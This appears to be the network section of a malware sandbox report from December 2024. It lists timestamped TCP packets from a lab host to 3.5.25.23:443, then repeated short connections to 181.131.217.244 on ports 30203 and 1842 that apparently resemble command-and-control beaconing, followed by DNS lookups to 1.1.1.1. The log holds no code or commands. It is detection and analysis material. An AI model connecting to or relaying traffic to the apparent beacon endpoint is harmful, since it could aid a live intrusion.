Dec 12, 2024 17:35:48.289510012 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:48.289518118 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:48.289529085 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:48.289561033 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:48.294482946 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:48.294503927 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:48.294547081 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:48.294553995 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:48.294564962 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:48.294594049 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:48.300667048 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:48.300687075 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:48.300726891 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:48.300735950 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:48.300746918 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:48.300833941 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:48.307336092 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:48.307362080 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:48.307398081 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:48.307405949 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:48.307418108 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:48.307450056 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:48.460036993 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:48.460072994 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:48.460246086 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:48.460247040 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:48.460268021 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:48.460314035 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:48.464955091 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:48.464976072 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:48.465042114 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:48.465050936 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:48.468686104 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:48.470722914 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:48.470742941 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:48.470870018 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:48.470877886 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:48.472714901 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:48.476250887 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:48.476288080 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:48.476346016 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:48.476356030 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:48.476365089 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:48.476392031 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:48.481158018 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:48.481178045 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:48.481240034 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:48.481250048 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:48.487145901 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:48.487169981 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:48.487196922 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:48.487205029 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:48.487237930 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:48.487274885 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:48.492166996 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:48.492187023 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:48.492229939 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:48.492239952 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:48.492249966 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:48.492288113 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:48.497817993 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:48.497836113 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:48.497900963 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:48.497900963 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:48.497910976 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:48.498033047 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:48.652188063 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:48.652220964 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:48.652271986 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:48.652291059 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:48.652304888 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:48.652339935 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:48.657736063 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:48.657762051 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:48.657813072 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:48.657821894 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:48.657833099 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:48.657866001 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:48.663372993 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:48.663394928 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:48.663448095 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:48.663459063 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:48.664674997 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:48.668308020 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:48.668330908 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:48.668386936 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:48.668395996 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:48.668680906 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:48.673954964 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:48.673994064 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:48.674026012 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:48.674034119 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:48.674043894 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:48.674073935 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:48.679255962 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:48.679276943 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:48.679342031 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:48.679352045 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:48.680677891 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:48.684864998 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:48.684919119 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:48.684957981 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:48.684967995 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:48.684998035 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:48.685009003 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:48.690542936 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:48.690577030 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:48.690639973 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:48.690648079 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:48.690691948 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:48.844263077 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:48.844290018 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:48.844343901 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:48.844362974 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:48.844373941 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:48.844398975 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:48.850722075 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:48.850748062 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:48.850805044 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:48.850811958 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:48.850826979 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:48.850848913 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:48.855602026 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:48.855628014 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:48.855688095 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:48.855695009 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:48.855705023 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:48.855736017 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:48.861186981 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:48.861210108 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:48.861298084 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:48.861298084 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:48.861305952 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:48.861392021 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:48.867021084 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:48.867047071 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:48.867093086 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:48.867100000 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:48.867126942 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:48.867146969 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:48.871407032 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:48.871431112 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:48.871470928 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:48.871476889 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:48.871488094 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:48.871531963 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:48.877084017 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:48.877106905 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:48.877146006 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:48.877152920 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:48.877190113 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:48.877190113 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:48.882071972 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:48.882096052 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:48.882129908 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:48.882137060 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:48.882169008 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:48.882177114 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:49.037288904 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:49.037328005 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:49.037420988 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:49.037440062 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:49.037472963 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:49.037482023 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:49.042331934 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:49.042360067 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:49.042462111 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:49.042476892 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:49.043543100 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:49.044219017 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:49.044303894 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:49.044311047 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:49.044326067 CET	443	49708	3.5.25.23	192.168.2.8
Dec 12, 2024 17:35:49.044363022 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:49.055500031 CET	49708	443	192.168.2.8	3.5.25.23
Dec 12, 2024 17:35:52.676983118 CET	49709	30203	192.168.2.8	181.131.217.244
Dec 12, 2024 17:35:52.796864033 CET	30203	49709	181.131.217.244	192.168.2.8
Dec 12, 2024 17:35:52.796942949 CET	49709	30203	192.168.2.8	181.131.217.244
Dec 12, 2024 17:35:52.801803112 CET	49709	30203	192.168.2.8	181.131.217.244
Dec 12, 2024 17:35:52.921885014 CET	30203	49709	181.131.217.244	192.168.2.8
Dec 12, 2024 17:35:52.922024965 CET	49709	30203	192.168.2.8	181.131.217.244
Dec 12, 2024 17:35:53.041848898 CET	30203	49709	181.131.217.244	192.168.2.8
Dec 12, 2024 17:35:54.143420935 CET	30203	49709	181.131.217.244	192.168.2.8
Dec 12, 2024 17:35:54.143655062 CET	49709	30203	192.168.2.8	181.131.217.244
Dec 12, 2024 17:35:54.149029970 CET	49709	30203	192.168.2.8	181.131.217.244
Dec 12, 2024 17:35:54.268930912 CET	30203	49709	181.131.217.244	192.168.2.8
Dec 12, 2024 17:36:17.343663931 CET	49711	1842	192.168.2.8	181.131.217.244
Dec 12, 2024 17:36:17.463437080 CET	1842	49711	181.131.217.244	192.168.2.8
Dec 12, 2024 17:36:17.464773893 CET	49711	1842	192.168.2.8	181.131.217.244
Dec 12, 2024 17:36:17.465923071 CET	49711	1842	192.168.2.8	181.131.217.244
Dec 12, 2024 17:36:17.585654020 CET	1842	49711	181.131.217.244	192.168.2.8
Dec 12, 2024 17:36:19.654618979 CET	1842	49711	181.131.217.244	192.168.2.8
Dec 12, 2024 17:36:19.654697895 CET	49711	1842	192.168.2.8	181.131.217.244
Dec 12, 2024 17:36:19.654727936 CET	49711	1842	192.168.2.8	181.131.217.244
Dec 12, 2024 17:36:19.774812937 CET	1842	49711	181.131.217.244	192.168.2.8
Dec 12, 2024 17:36:20.670042038 CET	49712	1842	192.168.2.8	181.131.217.244
Dec 12, 2024 17:36:20.790647984 CET	1842	49712	181.131.217.244	192.168.2.8
Dec 12, 2024 17:36:20.790781021 CET	49712	1842	192.168.2.8	181.131.217.244
Dec 12, 2024 17:36:20.791394949 CET	49712	1842	192.168.2.8	181.131.217.244
Dec 12, 2024 17:36:20.911448956 CET	1842	49712	181.131.217.244	192.168.2.8
Dec 12, 2024 17:36:34.905014992 CET	1842	49712	181.131.217.244	192.168.2.8
Dec 12, 2024 17:36:34.905154943 CET	49712	1842	192.168.2.8	181.131.217.244
Dec 12, 2024 17:36:34.905200958 CET	49712	1842	192.168.2.8	181.131.217.244
Dec 12, 2024 17:36:35.025053978 CET	1842	49712	181.131.217.244	192.168.2.8
Dec 12, 2024 17:36:35.919655085 CET	49730	1842	192.168.2.8	181.131.217.244
Dec 12, 2024 17:36:36.039865971 CET	1842	49730	181.131.217.244	192.168.2.8
Dec 12, 2024 17:36:36.039947033 CET	49730	1842	192.168.2.8	181.131.217.244
Dec 12, 2024 17:36:36.044017076 CET	49730	1842	192.168.2.8	181.131.217.244
Dec 12, 2024 17:36:36.163949966 CET	1842	49730	181.131.217.244	192.168.2.8
Dec 12, 2024 17:36:40.684885979 CET	1842	49730	181.131.217.244	192.168.2.8
Dec 12, 2024 17:36:40.684964895 CET	49730	1842	192.168.2.8	181.131.217.244
Dec 12, 2024 17:36:40.685009956 CET	49730	1842	192.168.2.8	181.131.217.244
Dec 12, 2024 17:36:40.804816961 CET	1842	49730	181.131.217.244	192.168.2.8
Dec 12, 2024 17:36:41.701553106 CET	49746	1842	192.168.2.8	181.131.217.244
Dec 12, 2024 17:36:41.821398973 CET	1842	49746	181.131.217.244	192.168.2.8
Dec 12, 2024 17:36:41.823621988 CET	49746	1842	192.168.2.8	181.131.217.244
Dec 12, 2024 17:36:41.824213982 CET	49746	1842	192.168.2.8	181.131.217.244
Dec 12, 2024 17:36:41.946607113 CET	1842	49746	181.131.217.244	192.168.2.8
Dec 12, 2024 17:36:46.543365002 CET	1842	49746	181.131.217.244	192.168.2.8
Dec 12, 2024 17:36:46.544337034 CET	49746	1842	192.168.2.8	181.131.217.244
Dec 12, 2024 17:36:46.544337988 CET	49746	1842	192.168.2.8	181.131.217.244
Dec 12, 2024 17:36:46.664149046 CET	1842	49746	181.131.217.244	192.168.2.8
Dec 12, 2024 17:36:47.567073107 CET	49758	1842	192.168.2.8	181.131.217.244
Dec 12, 2024 17:36:47.689551115 CET	1842	49758	181.131.217.244	192.168.2.8
Dec 12, 2024 17:36:47.691186905 CET	49758	1842	192.168.2.8	181.131.217.244
Dec 12, 2024 17:36:47.691627979 CET	49758	1842	192.168.2.8	181.131.217.244
Dec 12, 2024 17:36:47.811441898 CET	1842	49758	181.131.217.244	192.168.2.8
Dec 12, 2024 17:36:49.894921064 CET	1842	49758	181.131.217.244	192.168.2.8
Dec 12, 2024 17:36:49.900790930 CET	49758	1842	192.168.2.8	181.131.217.244
Dec 12, 2024 17:36:49.900875092 CET	49758	1842	192.168.2.8	181.131.217.244
Dec 12, 2024 17:36:50.020637035 CET	1842	49758	181.131.217.244	192.168.2.8
Dec 12, 2024 17:36:50.907468081 CET	49768	1842	192.168.2.8	181.131.217.244
Dec 12, 2024 17:36:51.027535915 CET	1842	49768	181.131.217.244	192.168.2.8
Dec 12, 2024 17:36:51.027642965 CET	49768	1842	192.168.2.8	181.131.217.244
Dec 12, 2024 17:36:51.028177977 CET	49768	1842	192.168.2.8	181.131.217.244
Dec 12, 2024 17:36:51.147957087 CET	1842	49768	181.131.217.244	192.168.2.8
Dec 12, 2024 17:36:55.661998034 CET	1842	49768	181.131.217.244	192.168.2.8
Dec 12, 2024 17:36:55.662091970 CET	49768	1842	192.168.2.8	181.131.217.244
Dec 12, 2024 17:36:55.662128925 CET	49768	1842	192.168.2.8	181.131.217.244
Dec 12, 2024 17:36:55.782412052 CET	1842	49768	181.131.217.244	192.168.2.8
Dec 12, 2024 17:36:56.697397947 CET	49780	1842	192.168.2.8	181.131.217.244
Dec 12, 2024 17:36:56.817378044 CET	1842	49780	181.131.217.244	192.168.2.8
Dec 12, 2024 17:36:56.817447901 CET	49780	1842	192.168.2.8	181.131.217.244
Dec 12, 2024 17:36:56.817884922 CET	49780	1842	192.168.2.8	181.131.217.244
Dec 12, 2024 17:36:56.938507080 CET	1842	49780	181.131.217.244	192.168.2.8
Dec 12, 2024 17:37:04.405059099 CET	1842	49780	181.131.217.244	192.168.2.8
Dec 12, 2024 17:37:04.405174971 CET	49780	1842	192.168.2.8	181.131.217.244
Dec 12, 2024 17:37:04.405225992 CET	49780	1842	192.168.2.8	181.131.217.244
Dec 12, 2024 17:37:04.525108099 CET	1842	49780	181.131.217.244	192.168.2.8
Dec 12, 2024 17:37:05.420133114 CET	49801	1842	192.168.2.8	181.131.217.244
Dec 12, 2024 17:37:05.540051937 CET	1842	49801	181.131.217.244	192.168.2.8
Dec 12, 2024 17:37:05.540324926 CET	49801	1842	192.168.2.8	181.131.217.244
Dec 12, 2024 17:37:05.540797949 CET	49801	1842	192.168.2.8	181.131.217.244
Dec 12, 2024 17:37:05.664129972 CET	1842	49801	181.131.217.244	192.168.2.8
Dec 12, 2024 17:37:10.149399996 CET	1842	49801	181.131.217.244	192.168.2.8
Dec 12, 2024 17:37:10.149610043 CET	49801	1842	192.168.2.8	181.131.217.244
Dec 12, 2024 17:37:10.149610996 CET	49801	1842	192.168.2.8	181.131.217.244
Dec 12, 2024 17:37:10.269598007 CET	1842	49801	181.131.217.244	192.168.2.8
Dec 12, 2024 17:37:11.153744936 CET	49813	1842	192.168.2.8	181.131.217.244
Dec 12, 2024 17:37:11.273942947 CET	1842	49813	181.131.217.244	192.168.2.8
Dec 12, 2024 17:37:11.274050951 CET	49813	1842	192.168.2.8	181.131.217.244
Dec 12, 2024 17:37:11.274435997 CET	49813	1842	192.168.2.8	181.131.217.244
Dec 12, 2024 17:37:11.396363974 CET	1842	49813	181.131.217.244	192.168.2.8
Dec 12, 2024 17:37:21.251075983 CET	1842	49813	181.131.217.244	192.168.2.8
Dec 12, 2024 17:37:21.251183033 CET	49813	1842	192.168.2.8	181.131.217.244
Dec 12, 2024 17:37:21.251234055 CET	49813	1842	192.168.2.8	181.131.217.244
Dec 12, 2024 17:37:21.371220112 CET	1842	49813	181.131.217.244	192.168.2.8
Dec 12, 2024 17:37:22.263890028 CET	49839	1842	192.168.2.8	181.131.217.244
Dec 12, 2024 17:37:22.384042978 CET	1842	49839	181.131.217.244	192.168.2.8
Dec 12, 2024 17:37:22.384130001 CET	49839	1842	192.168.2.8	181.131.217.244
Dec 12, 2024 17:37:22.384536982 CET	49839	1842	192.168.2.8	181.131.217.244
Dec 12, 2024 17:37:22.505532026 CET	1842	49839	181.131.217.244	192.168.2.8
Dec 12, 2024 17:37:36.515501022 CET	1842	49839	181.131.217.244	192.168.2.8
Dec 12, 2024 17:37:36.515691042 CET	49839	1842	192.168.2.8	181.131.217.244
Dec 12, 2024 17:37:36.576047897 CET	49839	1842	192.168.2.8	181.131.217.244
Dec 12, 2024 17:37:36.695914984 CET	1842	49839	181.131.217.244	192.168.2.8
Dec 12, 2024 17:37:37.607342958 CET	49872	1842	192.168.2.8	181.131.217.244
Dec 12, 2024 17:37:37.728105068 CET	1842	49872	181.131.217.244	192.168.2.8
Dec 12, 2024 17:37:37.728636980 CET	49872	1842	192.168.2.8	181.131.217.244
Dec 12, 2024 17:37:37.728848934 CET	49872	1842	192.168.2.8	181.131.217.244
Dec 12, 2024 17:37:37.849256039 CET	1842	49872	181.131.217.244	192.168.2.8
Dec 12, 2024 17:37:40.033037901 CET	1842	49872	181.131.217.244	192.168.2.8
Dec 12, 2024 17:37:40.033150911 CET	49872	1842	192.168.2.8	181.131.217.244
Dec 12, 2024 17:37:40.033150911 CET	49872	1842	192.168.2.8	181.131.217.244
Dec 12, 2024 17:37:40.152961969 CET	1842	49872	181.131.217.244	192.168.2.8
Dec 12, 2024 17:37:41.047341108 CET	49883	1842	192.168.2.8	181.131.217.244
Dec 12, 2024 17:37:41.167260885 CET	1842	49883	181.131.217.244	192.168.2.8
Dec 12, 2024 17:37:41.167360067 CET	49883	1842	192.168.2.8	181.131.217.244
Dec 12, 2024 17:37:41.167867899 CET	49883	1842	192.168.2.8	181.131.217.244
Dec 12, 2024 17:37:41.287659883 CET	1842	49883	181.131.217.244	192.168.2.8
Dec 12, 2024 17:37:48.845724106 CET	1842	49883	181.131.217.244	192.168.2.8
Dec 12, 2024 17:37:48.845777988 CET	49883	1842	192.168.2.8	181.131.217.244
Dec 12, 2024 17:37:48.848807096 CET	49883	1842	192.168.2.8	181.131.217.244
Dec 12, 2024 17:37:48.968462944 CET	1842	49883	181.131.217.244	192.168.2.8
Dec 12, 2024 17:37:49.857403994 CET	49903	1842	192.168.2.8	181.131.217.244
Dec 12, 2024 17:37:49.979495049 CET	1842	49903	181.131.217.244	192.168.2.8
Dec 12, 2024 17:37:49.979567051 CET	49903	1842	192.168.2.8	181.131.217.244
Dec 12, 2024 17:37:49.980011940 CET	49903	1842	192.168.2.8	181.131.217.244
Dec 12, 2024 17:37:50.099808931 CET	1842	49903	181.131.217.244	192.168.2.8
Dec 12, 2024 17:37:52.371175051 CET	1842	49903	181.131.217.244	192.168.2.8
Dec 12, 2024 17:37:52.371241093 CET	49903	1842	192.168.2.8	181.131.217.244
Dec 12, 2024 17:37:52.371290922 CET	49903	1842	192.168.2.8	181.131.217.244
Dec 12, 2024 17:37:52.491281033 CET	1842	49903	181.131.217.244	192.168.2.8
Dec 12, 2024 17:37:53.373258114 CET	49913	1842	192.168.2.8	181.131.217.244
Dec 12, 2024 17:37:53.493107080 CET	1842	49913	181.131.217.244	192.168.2.8
Dec 12, 2024 17:37:53.493379116 CET	49913	1842	192.168.2.8	181.131.217.244
Dec 12, 2024 17:37:53.493829012 CET	49913	1842	192.168.2.8	181.131.217.244
Dec 12, 2024 17:37:53.613806963 CET	1842	49913	181.131.217.244	192.168.2.8
Dec 12, 2024 17:38:13.000869989 CET	1842	49913	181.131.217.244	192.168.2.8
Dec 12, 2024 17:38:13.003750086 CET	49913	1842	192.168.2.8	181.131.217.244
Dec 12, 2024 17:38:13.003789902 CET	49913	1842	192.168.2.8	181.131.217.244
Dec 12, 2024 17:38:13.123575926 CET	1842	49913	181.131.217.244	192.168.2.8
Dec 12, 2024 17:38:14.013515949 CET	49959	1842	192.168.2.8	181.131.217.244
Dec 12, 2024 17:38:14.133362055 CET	1842	49959	181.131.217.244	192.168.2.8
Dec 12, 2024 17:38:14.136904001 CET	49959	1842	192.168.2.8	181.131.217.244
Dec 12, 2024 17:38:14.140858889 CET	49959	1842	192.168.2.8	181.131.217.244
Dec 12, 2024 17:38:14.260644913 CET	1842	49959	181.131.217.244	192.168.2.8
Dec 12, 2024 17:38:16.331836939 CET	1842	49959	181.131.217.244	192.168.2.8
Dec 12, 2024 17:38:16.331964016 CET	49959	1842	192.168.2.8	181.131.217.244
Dec 12, 2024 17:38:16.332007885 CET	49959	1842	192.168.2.8	181.131.217.244
Dec 12, 2024 17:38:16.452111959 CET	1842	49959	181.131.217.244	192.168.2.8
Dec 12, 2024 17:38:17.343173027 CET	49965	1842	192.168.2.8	181.131.217.244
Dec 12, 2024 17:38:17.463114023 CET	1842	49965	181.131.217.244	192.168.2.8
Dec 12, 2024 17:38:17.465177059 CET	49965	1842	192.168.2.8	181.131.217.244
Dec 12, 2024 17:38:17.465445995 CET	49965	1842	192.168.2.8	181.131.217.244
Dec 12, 2024 17:38:17.585437059 CET	1842	49965	181.131.217.244	192.168.2.8

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 12, 2024 17:35:35.871200085 CET	55962	53	192.168.2.8	1.1.1.1
Dec 12, 2024 17:35:36.008094072 CET	53	55962	1.1.1.1	192.168.2.8
Dec 12, 2024 17:35:37.964526892 CET	56350	53	192.168.2.8	1.1.1.1
Dec 12, 2024 17:35:38.102741957 CET	53	56350	1.1.1.1	192.168.2.8
Dec 12, 2024 17:35:40.377872944 CET	53673	53	192.168.2.8	1.1.1.1
Dec 12, 2024 17:35:40.602955103 CET	53	53673	1.1.1.1	192.168.2.8
Dec 12, 2024 17:36:17.002454042 CET	50987	53	192.168.2.8	1.1.1.1
Dec 12, 2024 17:36:17.338908911 CET	53	50987	1.1.1.1	192.168.2.8

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
